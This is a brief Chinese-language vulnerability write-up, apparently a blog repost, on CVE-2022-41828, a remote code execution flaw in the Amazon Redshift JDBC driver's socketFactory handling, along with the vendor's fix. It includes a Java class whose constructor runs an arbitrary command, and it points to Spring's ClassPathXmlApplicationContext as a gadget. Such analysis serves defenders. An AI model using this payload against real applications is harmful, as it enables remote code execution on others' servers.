CVE-2022-41828 Amazon Redshift JDBC Driver RCE
2022-10-28 12:48:8 Author: y4er.com(查看原文) 阅读量:15 收藏

看到了这个东西,然后看了一下发现和pgsql一样

https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86

在初始化时 com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory拿socketFactoryArg和socketFactory class初始化。

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/1.png

com.amazon.redshift.util.ObjectFactory#instantiate newInstance找Properties类型或者String类型参数的构造函数

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/2.png

这个地方用了一个恶意类

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
package org.example;

import java.io.IOException;

public class atao {

    public atao(String cmd) {
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

和pgsql一样可以用spring中的ClassPathXmlApplicationContext

借少宇jas502n师傅的图

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/3.png

修复

https://github.com/aws/amazon-redshift-jdbc-driver/commit/9999659bbc9f3d006fb02a0bf39d5bcf3b503605

多了一个参数

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/4.png

这里用Class<? extends T> cls = Class.forName(classname).asSubclass(expectedClass);限制了Class类型,所以没法new任意对象了。

https://y4er.com/img/uploads/CVE-2022-41828-amazon-redshift-jdbc-driver-RCE/5.png

修复方案和pgsql一样。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


文章来源: https://y4er.com/posts/cve-2022-41828-amazon-redshift-jdbc-driver-rce/
如有侵权请联系:admin#unsafe.sh